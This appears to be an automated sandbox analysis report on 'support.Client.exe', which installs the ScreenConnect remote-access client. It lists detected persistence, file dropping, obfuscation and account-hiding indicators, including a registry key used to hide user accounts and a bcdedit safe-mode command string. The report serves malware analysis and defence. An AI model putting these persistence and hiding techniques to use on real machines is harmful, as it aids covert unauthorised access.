Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll

Source: C:\Users\user\Desktop\support.Client.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: support.Client.exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: support.Client.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: support.Client.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: support.Client.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35642000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3526A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985211028.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: support.Client.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35266000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1982303877.00000000010C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3547347231.00000000021A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3547651493.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1977772120.0000000000A9D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35262000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1988194616.000000001BEC2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35262000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1988194616.000000001BEC2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35642000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3526A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985211028.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC350B8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1983243347.0000000004D32000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

PE file contains a valid data directory to section mapping

Source: support.Client.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: support.Client.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: support.Client.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: support.Client.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: support.Client.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Binary contains a suspicious time stamp

Source: ScreenConnect.Client.dll.1.dr

Static PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\support.Client.exe

0_2_00AD1000

PE file contains an invalid checksum

Source: support.Client.exe

Static PE information: real checksum: 0x1bda6 should be: 0x18818

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00AD1BC0 push ecx; ret	0_2_00AD1BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd	1_2_00007FFD9B77D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B897D00 push eax; retf	1_2_00007FFD9B897D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89842E pushad ; ret	1_2_00007FFD9B89845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8900BD pushad ; iretd	1_2_00007FFD9B8900C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89845E push eax; ret	1_2_00007FFD9B89846D
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B874162 push eax; ret	6_2_00007FFD9B874163
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B8730BA push eax; iretd	6_2_00007FFD9B8730BB
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B87401A push eax; iretd	6_2_00007FFD9B87401B
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B872FDA pushad ; retf	6_2_00007FFD9B872FDB
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B873F3A pushad ; retf	6_2_00007FFD9B873F3B
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD9B872E18 push eax; ret	6_2_00007FFD9B872E7B
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC7BE6 push ss; ret	9_2_00007FFD9BBC7BE7
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC1281 push ebx; iretd	9_2_00007FFD9BBC1282
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC116D push esp; iretd	9_2_00007FFD9BBC116E
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC799B push ss; iretd	9_2_00007FFD9BBC7A5E
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC5540 pushad ; retf	9_2_00007FFD9BBC5559
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC5550 pushad ; retf	9_2_00007FFD9BBC5559

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Jump to behavior

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (074906cf-7913-4152-acb8-ba6041fce90b)

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1988194616.000000001BEC2000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 00000007.00000002.1982303877.00000000010C2000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3547347231.00000000021A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3547651493.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\support.Client.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
